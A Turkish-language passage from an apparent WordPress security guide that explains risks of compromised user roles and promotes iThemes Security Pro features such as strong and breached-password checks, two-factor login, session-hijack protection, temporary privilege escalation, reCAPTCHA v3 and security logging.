Her kullanıcının farklı yetenekleri vardır. Yetenekler, gösterge panosuna eriştiklerinde ne yapabileceklerini belirler. WordPress kullanıcı rolleri ve izinleri hakkında daha fazlasını okuyun.

Farklı Hacklenmiş WordPress Kullanıcılarının Potansiyel Hasarı

WordPress kullanıcılarımızı nasıl güvence altına alacağımızı anlayabilmemiz için öncelikle güvenliği ihlal edilmiş her bir kullanıcı türünün tehdit düzeyini anlamamız gerekir. Bir saldırganın verebileceği hasarın türü ve düzeyi, hacklediği kullanıcının rollerine ve yeteneklerine bağlı olarak büyük ölçüde değişir.

Yönetici – Tehdit Seviyesi Yüksek

Yönetici kullanıcılar, istedikleri her şeyi yapabilme yeteneklerine sahiptir.

• Kullanıcıları oluşturun, kaldırın ve değiştirin.
• Eklentileri ve temaları yükleyin, kaldırın ve düzenleyin.
• Tüm gönderileri ve sayfaları oluşturun, kaldırın ve düzenleyin.
• Yayınları ve sayfaları yayınlayın ve yayından kaldırın.
• Medya ekleyin ve çıkarın.

Bir bilgisayar korsanı sitenizin Yöneticilerinden birini ele geçirebilirse, web sitenizi fidye için tutabilir. Daha önce de belirttiğimiz gibi, Fidye Yazılımı , bir bilgisayar korsanının web sitenizi ele geçirdiği ve siz onlara yüksek bir ücret ödemediğiniz sürece onu size geri bırakmadığı anlamına gelir.

Editör – Tehdit Seviyesi Yüksek

Editör , web sitesinin tüm içeriğini yönetir. Bu kullanıcıların hala oldukça fazla gücü var.

• Tüm gönderileri ve sayfaları oluşturun, silin ve düzenleyin.
• Tüm gönderileri ve sayfaları yayınlayın ve yayından kaldırın.
• Medya dosyalarını yükleyin.
• Tüm bağlantıları yönetin.
• Yorumları yönetin.
• Kategorileri Yönetin.

Saldırgan bir Editörün hesabının kontrolünü ele geçirirse, sayfalarınızdan birini bir phishing saldırısında kullanmak üzere değiştirebilir. Kimlik avı , oturum açma kimlik bilgileri ve kredi kartı numaraları dahil olmak üzere kullanıcı verilerini çalmak için kullanılan bir saldırı türüdür.

Kimlik avı, web sitenizi Google tarafından kara listeye almanın en kesin yollarından biridir. Her gün 10.000 site çeşitli nedenlerle Google'ın engellenenler listesine giriyor.

Yazar – Tehdit Düzeyi Orta

Yazar , kendi içeriğini oluşturmak ve yönetmek için tasarlanmıştır.

• Kendi gönderilerini ve sayfalarını oluşturun, silin ve düzenleyin.
• Kendi gönderilerini yayınlayın ve yayından kaldırın.
• Medya dosyalarını yükleyin

Saldırgan bir Yazarın hesabının kontrolünü ele geçirirse, site ziyaretçilerinizi kötü niyetli web sitelerine gönderen sayfalar ve gönderiler oluşturabilir.

Katılımcı ve Abone – Tehdit Düzeyi Düşük

Katılımcı , Yazar kullanıcı rolünün basit sürümüdür. Yayın yetkileri yok.

• Kendi gönderilerini oluştur ve düzenle.
• Kendi yayınlanmamış gönderilerini silin.

Abone , diğer kullanıcıların yayınladığı şeyleri okuyabilir.

Katkıda Bulunan veya Abone rolüne sahip bilgisayar korsanları herhangi bir kötü niyetli değişiklik yapamazken, kullanıcının hesabında veya profil sayfasında saklanan hassas bilgileri çalabilirler.

WordPress Kullanıcılarınızı Güvende Tutmak için 6 İpucu

Tamam, bu bilgisayar korsanlarının web sitelerimize yapabileceği oldukça kötü şeyler. İyi haber şu ki, WordPress kullanıcı hesaplarınıza yapılan saldırıların çoğu, biraz çaba sarf ederek önlenebilir.

WordPress kullanıcılarınızı güvence altına almak için yapabileceğiniz şeylere bir göz atalım. Gerçek şu ki, bu WordPress güvenlik yöntemleri, her tür WordPress kullanıcısının güvenliğini sağlamaya yardımcı olacaktır. Ancak, yöntemlerin her birini incelerken, yöntemi kullanmak için hangi kullanıcılara ihtiyaç duymanız gerektiğini size bildireceğiz.

1. İnsanlara Yalnızca İhtiyaç Duydukları Yetenekleri Verin

Web sitenizi korumanın en kolay yolu, kullanıcılarınıza yalnızca ihtiyaç duydukları yetenekleri vermektir, daha fazlasını değil. Birinin web sitenizde yapacağı tek şey kendi blog gönderilerini oluşturmak ve düzenlemekse, başkalarının gönderilerini düzenleme yeteneğine ihtiyaçları yoktur.

2. Güçlü Parolalarla Güvenli WordPress Kullanıcıları

Splash Data tarafından derlenen bir listede, tüm veri dökümlerinde bulunan en yaygın şifre 123456 idi. Veri dökümü, internette bir yere dökülen kullanıcı şifreleriyle dolu, saldırıya uğramış bir veritabanıdır. Veri dökümlerinde en yaygın şifre 123456 ise, web sitenizde kaç kişinin zayıf bir şifre kullandığını hayal edebiliyor musunuz?

Zayıf bir parola kullanmak, ön kapınızı bir parça bantla kilitlemeye çalışmak gibidir. Bilgisayar korsanlarının zayıf bir parolayı geçerek bir web sitesine kaba kuvvet kullanarak girmeleri hiçbir zaman uzun sürmedi. Artık bilgisayar korsanları saldırılarında bilgisayar grafik kartlarını kullandığından, bir parolayı kırmak için gereken süre hiç bu kadar az olmamıştı.

Örneğin, yüksek performanslı bir şifre kırma şirketi olan Terahash tarafından oluşturulan bir grafiğe bakalım. Grafikleri, 448x RTX 2080'lerden oluşan bir hashstack kümesi kullanarak bir parolayı kırmak için geçen süreyi gösterir.

Varsayılan olarak, WordPress, WP veritabanında depolanan kullanıcı şifrelerini toplamak için MD5 kullanır. Bu tabloya göre, Terahash 8 karakterlik bir şifreyi neredeyse anında kırabilir. Bu sadece süper etkileyici değil, aynı zamanda gerçekten korkutucu. İyi haber şu ki, üst düzey kullanıcılarımızın güçlü şifreler kullanmasını zorunlu kılarak WordPress girişimizi güvence altına alabiliriz.

iThemes Security Pro Parola Gereksinimi özelliği, belirli kullanıcıları güçlü bir parola kullanmaya zorlamanıza olanak tanır. Güvenlik ayarlarının ana sayfasındaki Parola Gereksinimleri özelliğini etkinleştirin ve ardından güçlü bir parola kullanmasını istediğiniz kullanıcıları seçin.

3. Reddedilen Güvenliği Aşan Parolalar

Verizon Veri İhlali Araştırmaları Raporuna göre, çalışanların %70'inden fazlası iş yerinde parolaları yeniden kullanıyor. Ancak rapordaki en önemli istatistik, bilgisayar korsanlığıyla ilgili ihlallerin %81'inin çalıntı veya zayıf parolalardan yararlanmasıdır.

Bilgisayar korsanları, sözlük saldırısı adı verilen bir kaba kuvvet saldırısı kullanır. Sözlük saldırısı, veritabanı dökümlerinde görünen yaygın olarak kullanılan parolalarla bir WordPress web sitesine girme yöntemidir. “Koleksiyon #1? MEGA'da barındırılan Veri İhlali, 1.160.253.228 benzersiz e-posta adresi ve şifre kombinasyonunu içeriyordu. Bu, b ile bir milyardır. Bu tür bir puan, bir sözlük saldırısının en sık kullanılan WordPress şifrelerini daraltmasına gerçekten yardımcı olacaktır.

Yazar seviyesi ve üzeri yeteneklere sahip kullanıcıların WordPress girişinizi güvence altına almak için güvenliği ihlal edilmiş şifreler kullanmasını önlemek bir zorunluluktur. Alt düzey kullanıcılarınızın güvenliği ihlal edilmiş parolalar kullanmasına izin vermemeyi de düşünebilirsiniz.

Yeni bir müşteri hesabı oluşturmayı mümkün olduğunca kolay hale getirmek tamamen anlaşılabilir ve teşvik edilmektedir. Ancak müşteriniz, kullandığı parolanın bir veri dökümünde bulunduğunu bilmeyebilir. Müşterinize, kullandıkları parolanın ele geçirilmiş olduğu konusunda onları uyararak harika bir hizmet yapmış olursunuz. Bu şifreyi her yerde kullanıyorlarsa, onları yolun aşağısındaki bazı büyük baş ağrılarından kurtarabilirsiniz.

iThemes Security Pro Güvenliği İhlal Edilen Parolaları Reddet özelliği, kullanıcıları Have I Been Pwned tarafından izlenen herhangi bir parola ihlalinde görünmeyen parolaları kullanmaya zorlar. Güvenlik ayarlarının ana sayfasındaki Parola Gereksinimleri özelliğini etkinleştirin ve ardından güvenliği ihlal edilmiş bir parola kullanmasını engellemek istediğiniz kullanıcıları seçin.

4. İki Faktörlü Kimlik Doğrulama ile Güvenli WordPress Kullanıcıları

İki faktörlü kimlik doğrulamayı kullanmak, WordPress girişinizi güvence altına almak için yapabileceğiniz en iyi şeydir. İki faktörlü kimlik doğrulama, iki ayrı doğrulama yöntemi gerektirerek bir kişinin kimliğini doğrulama işlemidir. Google, blogunda iki faktörlü kimlik doğrulamanın otomatik bot saldırılarının %100'ünü durdurabileceğini paylaştı. Bu ihtimalleri gerçekten seviyorum.

iThemes Security Pro İki Faktörlü Kimlik Doğrulama özelliği, web sitenize 2fa uygularken çok fazla esneklik sağlar. Kullanıcılarınızın tamamı veya bir kısmı için iki faktörü etkinleştirebilir ve üst düzey kullanıcılarınızı her oturum açmada 2fa kullanmaya zorlayabilirsiniz.

Size kolaylık sağlamak için iThemes Security Pro, iki faktörlü kimlik doğrulama için 2 farklı yöntem sunar.

1. Mobil Uygulama – Mobil uygulama yöntemi, iThemes Security Pro tarafından sağlanan en güvenli iki faktörlü kimlik doğrulama yöntemidir. Bu yöntem, Authy gibi ücretsiz iki faktörlü bir mobil uygulama kullanmanızı gerektirir.
2. E-posta – İki faktörlü e-posta yöntemi, kullanıcınızın e-posta adresine zamana duyarlı kodlar gönderir.
3. Yedek Kodlar – Birincil iki faktörlü yöntemin kaybolması durumunda oturum açmak için kullanılabilecek bir kerelik kullanım kodları seti.

5. WordPress Kullanıcılarını Oturum Ele Geçirmeye Karşı Güvenli Hale Getirin

WordPress, web sitenize her giriş yaptığınızda bir oturum çerezi oluşturur. Diyelim ki geliştirici tarafından terk edilen ve artık güvenlik güncellemeleri yayınlamayan bir tarayıcı uzantınız var. Ne yazık ki sizin için ihmal edilen tarayıcı uzantısında bir güvenlik açığı var. Güvenlik açığı, daha önce bahsedilen WordPress oturum çerezi de dahil olmak üzere kötü niyetli kişilerin tarayıcı çerezlerinizi ele geçirmesine olanak tanır. Bu tür bir hack, Session Hijacking olarak bilinir. Böylece, bir saldırgan, oturum açma bilgilerinizi geri almak ve WordPress kullanıcınızla kötü niyetli değişiklikler yapmaya başlamak için uzantı güvenlik açığından yararlanabilir.

Yöneticileriniz ve Editörleriniz için oturum ele geçirme korumasına sahip olmalısınız.

iThemes Security Pro Güvenilir Cihazlar özelliği, Oturum Ele Geçirme işlemini geçmişte bırakıyor . Bir oturum sırasında bir kullanıcının cihazı değişirse, iThemes Security, kullanıcının e-posta adresini değiştirmek veya kötü amaçlı eklentiler yüklemek gibi kullanıcının hesabında herhangi bir yetkisiz etkinliği önlemek için kullanıcının oturumunu otomatik olarak kapatır.

6. Evrensel Destek Kullanıcısı Oluşturun

Yeni bir kullanıcı oluşturduğunuzda, bir bilgisayar korsanının yararlanabileceği başka bir giriş noktası eklersiniz. Ancak, destek ararken veya bağımsız bir yükleniciyi işe aldıktan sonra olduğu gibi, web siteniz için dışarıdan yardıma ihtiyaç duyabileceğiniz zamanlar olabilir. Web sitenize geçici yönetici erişimi eklemek için güvenli ve güvenli bir yola ihtiyacınız var.

Örneğin, web sitenizde yüklü olan eklentilerden biriyle ilgili bazı sorunlarla karşılaştığınızı varsayalım. Destekle iletişime geçtikten sonra, daha yakından bakabilmeleri için web sitenize yönetici erişimi talep ederler. Bu tamamen makul bir istek gibi görünüyor ve onlara erişim izni vermeye karar veriyorsunuz.

Peki, birisine WordPress web sitemize nasıl geçici yönetici erişimi verebiliriz?

Web Sitenize Dışarıdan Erişim Verme: İki Seçenek

Tipik olarak, web sitenize harici erişim sağlamak için iki seçeneğiniz vardır …. ve ikisi de harika değil .

1. Kullanıcınızın Kimlik Bilgilerini Paylaşın

İlk ve en kötü seçeneğiniz, WordPress yönetici kullanıcınızın kullanıcı adını ve şifresini paylaşmaktır.

Yönetici Kimlik Bilgilerinizi Paylaşmak Neden Korkunç?

• Azaltılmış Güvenlik – Kullanıcınızın kimlik bilgilerini paylaşırsanız, kimlik bilgilerinizi kullanan kişinin oturum açmasına izin vermek için iki faktörlü kimlik doğrulamayı devre dışı bırakmanız gerekir. Google, blogunda iki faktörlü kimlik doğrulama veya 2 adımlı doğrulama kullanmanın otomatik bot saldırılarının %100'ünü durdurabileceğini paylaştı. İki faktörlü kimlik doğrulamayı kısa bir süre için bile devre dışı bırakmak, web sitenizin güvenliğini büyük ölçüde azaltır.
• Uygunsuz – Kimlik bilgilerinizi paylaşmak, şifrenizi değiştirmenizi gerektirir. Şifrenizi değiştirmeyi unutursanız, web sitenize istedikleri zaman yönetici erişimi olan bir veya daha fazla kişi vardır.

2. Destek Teknolojisi için Yeni Bir Kullanıcı Oluşturun

Destek uzmanı için yepyeni bir yönetici kullanıcı oluşturmak, yönetici kimlik bilgilerinizi paylaşmaktan daha iyi olsa da, yine de harika değil.

Destek Teknolojisi için Kullanıcı Yaratmak Neden Korkunç?

• Artan Güvenlik Açığı – Yeni bir yönetici kullanıcı oluşturmak, istismar edilebilecek başka bir giriş noktası ekler. Geçerli bir parola politikanız yoksa, destek teknolojisi zayıf bir parola seçerek WordPress girişinizi saldırılara karşı daha savunmasız hale getirebilir.
• Uygunsuz – Dışarıdan yardıma ihtiyacınız olduğunda yeni bir kullanıcı oluşturma sürecinden geçmek zaman alıcıdır. Yeni kullanıcıyı oluşturmanız ve ardından artık web sitenize erişmeleri gerekmediğinde kullanıcıyı silmeyi unutmayın. Kullanılmayan kullanıcıları web sitenizden kaldırmak bir WordPress güvenliği en iyi uygulamasıdır.

Ayrıcalık Yükseltme nedir?

iThemes Security Pro Ayrıcalık Yükseltme özelliği , bir kullanıcıya geçici olarak ekstra yetenekler vermenizi sağlar.

Ayrıcalık Yükseltme, web sitenize geçici olarak erişmesi gereken herhangi bir dış geliştiriciye veya destek teknisyenine verebileceğiniz evrensel bir kullanıcı oluşturmayı kolay ve güvenli hale getirir.

Ayrıcalık Yükseltme ile yeni bir kullanıcı oluşturabilir ve ona Destek adını verebilir ve ona Abone kullanıcı rolü verebilirsiniz. Bir dahaki sefere web sitenize geçici erişim sağlamanız gerektiğinde, Destek kullanıcısını bir aboneden bir yöneticiye dönüştürebilirsiniz. Bunu nasıl yapacağınızı yazının ilerleyen bölümlerinde anlatacağız, ancak önce, neden Ayrıcalık Yükseltmenin web sitenize erişim sağlamanın daha iyi bir yolu olduğundan bahsedelim.

Ayrıcalık Yükseltme Neden Daha İyidir?

• Kolay – Web sitenize her erişim izni vermeniz gerektiğinde yeni bir kullanıcı oluşturmanız gerekmez.
• Otomatik – Ayrıcalık yükseltme yalnızca 24 saat sürer. 24 saat dolduktan sonra, kullanıcı tüm ek ayrıcalıkları otomatik olarak kaybeder. Kullanıcıları kaldırmayı veya herhangi bir şifreyi değiştirmeyi hatırlamanız gerekmez.
• Güvenlikten Ödün Verilmez – Yine de bu evrensel destek kullanıcısının oturum açmak için iki faktörlü e-posta yöntemini kullanmasını isteyebilirsiniz; bu, diğer yönetici kullanıcılarınızla aynı güvenlik düzeyine sahip olduğunuz anlamına gelir. Gerçek kullanıcı rolü bir abone olduğundan, bunu web sitenizde bırakma konusunda gerçek bir risk taşımazsınız.

iThemes Security Pro'da Ayrıcalık Yükseltme Nasıl Kullanılır

Başlamak için, güvenlik ayarlarının ana sayfasında Ayrıcalık Yükseltmeyi etkinleştirin.

Yeni bir kullanıcı oluşturabilir ve ona Destek adını verebilir ve ona Abone kullanıcı rolü verebilirsiniz. Bir daha web sitenize geçici erişim sağlamanız gerektiğinde, Destek kullanıcınızın Profil sayfasına gidin.

Dış destek görevlisinin yeni bir şifre talep etmesine izin vermek için e-posta adresini güncelleyin. Ardından Geçici Ayrıcalık Yükseltme ayarlarını görene kadar aşağı kaydırın. Geçici Rol Ayarla geçiş düğmesini tıklayın ve Yönetici'yi seçin. Kullanıcı artık önümüzdeki 24 saat boyunca Yönetici erişimine sahip olacak.

24 saatin tamamına ihtiyaçları yoksa, kullanıcı profili sayfasından ayrıcalık yükseltmeyi iptal edebilirsiniz. 24 saatten fazla zamana ihtiyacınız varsa, Günler alanında ihtiyacınız olan tam gün sayısını ayarlayabilirsiniz.

Toplama

WordPress'in popülaritesi, onu tüm dünyadaki bilgisayar korsanları için bir hedef haline getiriyor. Tartıştığımız gibi, bir saldırgan en düşük WordPress kullanıcısını bile hackleyerek zarar verebilir.

İyi haber şu ki, WordPress kullanıcılarınıza yönelik saldırıları önlemenin bir yolu olmasa da, bizim tarafımızdan biraz çaba sarf ederek saldırıların başarılı olmasını önleyebiliriz.

8. Bölüm: Web Sitenizi Kötü Botlardan Koruyun

WordPress güvenlik kılavuzunun bu bölümünde, bir botun ne olduğunu ve kötü botların web sitenizde hasar oluşturmasını nasıl engelleyeceğinizi öğreneceksiniz.

Bot nedir?

Bot, belirli bir görev listesini gerçekleştirmek üzere programlanmış bir yazılım parçasıdır. Geliştiriciler, geliştiricinin başlamalarını söylemesine gerek kalmadan bir botun otomatik olarak izleyeceği bir dizi talimat oluşturur. Botlar, tekrarlayan ve sıradan görevleri bizden çok daha hızlı gerçekleştirecek.

Çeşitli botlar sürekli olarak web sitenizi tarıyor. Bu botlardan bazıları iyidir ve size değerli bir hizmet sunar. Diğer botların daha hain amaçları var. Bir botun ne olduğu ve farklı bot türleri hakkında konuşmak için biraz zaman ayıralım.

İyi Botlar

Botları izleme – iThemes Sync Pro Uptime Monitoring, web sitenizin çalışma süresini izlemek için bir bot kullanır. Bot, hala çevrimiçi olduğunu doğrulamak için her 5 dakikada bir web sitenizi kontrol eder. Web siteniz kapalıysa, bot sitenizi tekrar çevrimiçi duruma getirebilmeniz için size bir uyarı gönderir.

Denetim botları – iThemes Sync Pro Site Denetimi, web sayfalarınızın kalitesini kontrol etmek için bir Google Lighthouse botu kullanır. Denetim botunun bir başka mükemmel örneği, sizi var olmayan bir konuma gönderen bağlantıları arayan web sitenizi tarayan bozuk bir bağlayıcı denetleyicisidir.

Besleyici Botlar – Besleyici botlara mükemmel bir örnek, podcast oynatıcınızdır. Podcast oynatıcınız, abone olduğunuz podcast'lerin RSS beslemelerini izlemek için bir bot kullanır ve favori podcast'iniz yeni bir bölüm yayınladığında sizi uyarır.

Arama Motoru Botları – Bir Google web tarayıcısı, bir arama motoru botunun bir örneğidir. Bu tür bot, yeni veya değiştirilmiş sayfalar aramak için web sitenizi tarar ve web sitenizin bir dizinini oluşturur. Google veya başka bir arama motoru web sitenizin bir dizinine sahip olduğunda, sayfalarınızı arama motorlarını kullanan kişilerle paylaşabileceklerdir.

Güvenlik Botları – iThemes Security Pro Site Taraması, yüklü eklentilerinizin ve temalarınızın listesini güvenlik açığı veritabanımızla karşılaştırmak için bir bot kullanır. Bilinen bir güvenlik açığıyla yüklenmiş bir eklentiniz veya temanız varsa, varsa bot otomatik olarak bir yama uygular.

Kötü Botlar

İçerik Kazıma Botları – Bu botlar, web sitenizin içeriğini izniniz olmadan indirmek için programlanmıştır. Bot, SEO'larını geliştirmek ve site trafiğinizi çalmak için saldırganın web sitesinde kullanmak üzere içeriği çoğaltabilir.

Spam Robotları – Spam robotları can sıkıcıdır. Ziyaretçilerinizi kötü niyetli web sitelerine gönderme umuduyla evden çalışırken milyoner olma vaadiyle yorumlarınızı alt üst edecekler.

Brute Force Botları - Brute Force botları, saldırmak için WordPress girişlerini arayan interneti tarar. Bu botlar bir oturum açma sayfasına geldiklerinde, bir siteye erişmenin en basit yolunu deneyecekler: Başarılı olana kadar kullanıcı adlarını ve şifreleri tekrar tekrar tahmin etmeye çalışarak.

İyi Botları Engellemeden Kötü Botları Engelleme: reCAPTCHA V3

Google reCAPTCHA, kötü botların web sitenizde güvenliği ihlal edilmiş şifreler kullanarak web sitenize girmeye çalışmak, spam göndermek ve hatta içeriğinizi kazımak gibi kötü amaçlı etkinliklerde bulunmasını önlemeye yardımcı olur.

Ancak meşru kullanıcılar giriş yapabilir, satın alabilir, sayfaları görüntüleyebilir veya hesap oluşturabilir. reCAPTCHA, insanları ve robotları birbirinden ayırmak için gelişmiş risk analizi teknikleri kullanır.

iThemes Security Pro'daki Google reCAPTCHA özelliği, sitenizi kötü botlardan korur. Bu botlar, güvenliği ihlal edilmiş şifreler kullanarak, spam göndererek ve hatta içeriğinizi kazıyarak web sitenize girmeye çalışıyor. reCAPTCHA, insanları ve robotları birbirinden ayırmak için gelişmiş risk analizi teknikleri kullanır.

reCAPTCHA sürüm 3'ün harika yanı, herhangi bir kullanıcı etkileşimi olmadan web sitenizdeki kötüye kullanım amaçlı bot trafiğini tespit etmenize yardımcı olmasıdır. Bir CAPTCHA sorgulaması göstermek yerine reCAPTCHA v3, sitenizde yapılan farklı istekleri izler ve her istek için bir puan döndürür. Puan 0,01 ile 1 arasındadır. reCAPTCHA tarafından döndürülen puan ne kadar yüksekse, bir insanın isteği yaptığından o kadar emin olur. reCAPTCHA tarafından döndürülen bu puan ne kadar düşükse, bir botun istekte bulunduğundan o kadar emin olur.

iThemes Security Pro, reCAPTCHA puanını kullanarak bir blok eşiği belirlemenize olanak tanır. Google, varsayılan olarak 0,5 kullanmanızı önerir. Eşiği çok yüksek ayarlarsanız, meşru kullanıcıları istemeden kilitleyebileceğinizi unutmayın.

reCAPTCHA'yı WordPress kullanıcı kaydınızda, parola sıfırlamada, oturum açmada ve yorumlarınızda etkinleştirebilirsiniz. iThemes Security Pro, bot ve insan puanının doğruluğunu artırmak için Google reCAPTCHA komut dosyasını tüm sayfalarda çalıştırmanıza olanak tanır.

Toplama

İyi botlar ve kötü botlar vardır. reCAPTCHA, değer sağlayan iyi botların yoluna çıkmadan web sitenizdeki kötü botları engeller.

9. Bölüm: WordPress Güvenlik Günlükleri

Günlük kaydı, WordPress güvenlik stratejinizin önemli bir parçasıdır. Yetersiz günlük kaydı ve izleme, bir güvenlik ihlalinin tespitinde gecikmeye neden olabilir. Çoğu ihlal araştırması, bir ihlali tespit etme süresinin 200 günden fazla olduğunu gösteriyor! Bu süre, bir saldırganın diğer sistemleri ihlal etmesine, daha fazla veriyi değiştirmesine, çalmasına veya yok etmesine izin verir. Yetersiz Günlüğe Kaydetme, bu nedenlerle OWASP web uygulaması güvenlik risklerinin ilk 10'unda yer aldı.

WordPress güvenlik günlüklerinin genel güvenlik stratejinizde çeşitli avantajları vardır.

1. Kimlik ve kötü niyetli davranışı durdurun.
2. Sizi bir ihlal konusunda uyarabilecek spot aktivite.
3. Ne kadar hasar verildiğini değerlendirin.
4. Saldırıya uğramış bir sitenin onarımında yardımcı olun.

Siteniz saldırıya uğrarsa, hızlı bir araştırma ve kurtarma işlemine yardımcı olacak en iyi bilgilere sahip olmak isteyeceksiniz.

WordPress Güvenlik Günlükleri nedir?

iThemes Security Pro'daki WordPress Güvenlik Günlükleri, web sitenizde meydana gelen önemli güvenlik olaylarını takip eder. Bu olayların, bir güvenlik ihlalinin meydana gelip gelmediğini veya ne zaman meydana geldiğini belirtmek için izlenmesi önemlidir.

Web sitenizin güvenlik günlükleri, herhangi bir güvenlik stratejisinin hayati bir parçasıdır. Bu kayıtlarda bulunan bilgiler, kötü oyuncuları kilitlemek, sitede istenmeyen bir değişikliği vurgulamak ve başarılı bir saldırının giriş noktasını belirleyip düzeltmeye yardımcı olmak için kullanılabilir.

iThemes Security Tarafından İzlenen ve Günlüğe Kaydedilen Güvenlik Olayları

İşte iThemes Security Pro eklentisi tarafından izlenen WordPress güvenlik olaylarına bir bakış.

1. WordPress Kaba Kuvvet Saldırıları

Kaba kuvvet saldırıları, bir web sitesine girmek için kullanıcı adlarını ve şifreleri keşfetmek için kullanılan deneme yanılma yöntemini ifade eder. WordPress herhangi bir kullanıcı oturum açma etkinliğini izlemez, bu nedenle sizi kaba kuvvet saldırısından korumak için WordPress'te yerleşik hiçbir şey yoktur. WordPress sitenizi korumak için giriş güvenliğinizi izlemek size kalmıştır.

Neyse ki, kaba kuvvet saldırısı çok karmaşık değildir ve günlüklerinizde tanımlaması oldukça kolaydır. Giriş yapmaya çalışan kullanıcı adını ve IP'yi ve girişin başarılı olup olmadığını kaydetmeniz gerekecektir. Tek bir kullanıcı adı veya IP'nin art arda başarısız oturum açma girişimleri olduğunu görürseniz, büyük olasılıkla bir kaba kuvvet saldırısı altındasınız demektir.

Web sitenizin saldırı altında olduğunu öğrendikten sonra, onu durdurabilirsiniz! Web sitenizde bir saldırının gerçekleşmesini önlemenin hiçbir yolu olmadığını unutmamak önemlidir. Ancak geçersiz oturum açma girişimlerini izleyerek bu saldırıların başarılı olmasını önleyebilirsiniz.

iThemes Security Pro, kötü adamları kilitlemede harikadır. Ancak, kötü bir adam kaba kuvvet saldırısında Bob kullanıcı adını kullanırsa ve Bob sitede gerçek bir kullanıcıysa, Bob ne yazık ki saldırganla birlikte kilitlenir.

Kötü adamların bir siteye girmesini engellemek harika bir his olsa da, güvenliğin gerçek kullanıcıların deneyimini etkilemesinden hoşlanmıyoruz. Kaba kuvvet saldırganı kilitli kalırken meşru kullanıcıların kullanıcı adı kilitlemesini atlamasına izin vermek için Sihirli Bağlantılar oluşturduk.

2. Kötü Amaçlı Yazılım Taramaları

Yalnızca kötü amaçlı yazılım taramaları yapmakla kalmamalı, aynı zamanda her kötü amaçlı yazılım taramasının sonuçlarını WordPress güvenlik günlüklerinize kaydetmelisiniz. Bazı güvenlik günlükleri yalnızca kötü amaçlı yazılım bulan tarama sonuçlarını kaydeder, ancak bu yeterli değildir. Web sitenizin ihlali durumunda mümkün olan en kısa sürede uyarılmak çok önemlidir. Bir hack hakkında bilgi sahibi olmanız ne kadar uzun sürerse, o kadar fazla zarar verir.

Güvenliğe yönelik proaktif bir yaklaşımın geçmişini görmek iyi hissettirse de, bu sadece bir bonustur ve her kötü amaçlı yazılım taramasını kaydetmenin nedeni değildir.

Planlanmış taramalarınızı belgelemiyorsanız, herhangi bir tarama hatası olup olmadığını bilemezsiniz. Başarısız taramaları kaydetmemek, sitenizin her gün kötü amaçlı yazılımlara karşı kontrol edildiğini düşünmenize neden olabilir, ancak gerçekte tarama tamamlanamıyor.

iThemes Security Pro'nun sizi WordPress saldırılarının bir numaralı nedeninden nasıl koruyabileceğini öğrenmek için Site Tarama özelliğinin öne çıkan gönderisini okuyun.

3. Kullanıcı Etkinliği

WordPress güvenlik günlüklerinizde kullanıcı etkinliğinin kaydını tutmak, başarılı bir saldırıdan sonra tasarruf lütufunuz olabilir.

Doğru kullanıcı etkinliğini izlerseniz, bir saldırının zaman çizelgesinde size yol gösterebilir ve bilgisayar korsanının yeni kullanıcılar eklemekten sitenize istenmeyen ilaç reklamları eklemeye kadar değiştirdiği her şeyi gösterebilir.

iThemes Security Pro, 5 tür kullanıcı etkinliğini izler:

1. Oturum Aç / Oturumu Kapat

Kaydedilen ilk kullanıcı etkinliği türü, kullanıcıların web sitenizde ve nereden oturum açtığı ve oturumu kapattığı zamandır. Kullanıcının oturum açmalarının zamanını ve yerini izlemek, güvenliği ihlal edilmiş bir kullanıcıyı tespit etmenize yardımcı olabilir. Bu kullanıcı alışılmadık bir zamanda mı yoksa yeni bir yerden mi giriş yaptı? Eğer öyleyse, araştırmanıza onlarla başlamak isteyebilirsiniz.

2. Kullanıcı Oluşturma / Kayıt

Kaydını tutmanız gereken bir sonraki aktivite, kullanıcı oluşturma, özellikle de Yönetici kullanıcıları oluşturmadır. Bir bilgisayar korsanı meşru bir kullanıcıyı tehlikeye atabilirse, gizlenmek amacıyla orada kendi yönetici kullanıcısını oluşturabilir. Hesabınızda garip bir şey fark etmeniz kolaydır, ancak başka bir kullanıcıdaki kötü amaçlı etkinliği tespit etmek çok daha zordur.

Kullanıcı kaydının izlenmesi de önemlidir. Bazı güvenlik açıkları, bilgisayar korsanlarının varsayılan yeni kullanıcı rolünü Aboneden Yöneticiye değiştirmesine olanak tanır.

Kullanıcı Günlüğünü yalnızca Yönetici kullanıcıların etkinliğini izlemek için ayarladıysanız, güvenlik günlüklerine yalnızca yeni Yönetici kullanıcı kaydı kaydedilir. Bu nedenle, güvenlik günlüklerinizde yeni kayıtlı bir kullanıcı görürseniz, bir şeyler ters gitti.

3. Eklenti Ekleme ve Kaldırma

Eklentileri kimin eklediğini ve kaldırdığını kaydetmek çok önemlidir. Siteniz saldırıya uğradığında, saldırganın web sitesine kötü amaçlı kod enjekte etmek için özel eklentilerini eklemesi kolay olacaktır.

Bir bilgisayar korsanının sunucunuza veya veritabanınıza erişimi olmasa bile, WordPress kontrol panelinizden bunlarda değişiklik yapabilirler. Bir eklenti kullanarak, bir sonraki spam reklam kampanyalarında kullanmak üzere sitenize yönlendirmeler ekleyebilir veya veritabanınıza kötü amaçlı yazılım enjekte edebilirler. Kötü niyetli kodları yürütüldükten sonra, suçlarının kanıtlarını ortadan kaldırmak için eklentiyi silebilirler. Şansımıza, hiçbirini kaçırmayacağız çünkü hepsi WordPress güvenlik günlüklerimizde belgelendi.

4. Temaları Değiştirme

iThemes Security Pro Kullanıcı Günlüğü tarafından izlenen başka bir kullanıcı etkinliği, birisinin web sitesinin temasını değiştirmesidir. Temanızın beklenmedik bir şekilde değiştiğini fark ederseniz, değişikliği kimin yaptığını öğrenmek için WordPress güvenlik günlüklerinize bakabilirsiniz.

5. Gönderiler ve Sayfalardaki Değişiklikler

Son olarak, gönderi ve sayfalarınızdaki değişiklikleri izlemek istiyorsunuz. Trafiğinizi diğer sitelere göndermek için herhangi bir bağlantı eklendi mi? Gönderileri ve sayfaları izlemek, bir ihlalden sonra web sitenize eklenen utanç verici sayfaları veya kötü niyetli bağlantıları bulmanıza yardımcı olabilir.

Hangi gönderinin değiştirildiğini öğrenmek için gönderi kimliğini bulmak için Ayrıntıları Görüntüle bağlantılarını tıklayın.

Kullanıcı etkinliğini izlemenin bir saldırıdan geri dönmenize nasıl yardımcı olabileceği hakkında daha fazla bilgi edinmek için Kullanıcı Günlüğü özelliği öne çıkan gönderisine göz atın.

Toplama

Yetersiz günlük kaydı, OWASP'ın en önemli 10 web uygulaması güvenlik riskinden biridir. Doğru davranışı izlemek, saldırıları belirlemenize ve durdurmanıza, bir ihlali tespit etmenize ve başarılı bir saldırıdan sonra web sitenize verilen zarara erişmenize ve onarmanıza yardımcı olacaktır.

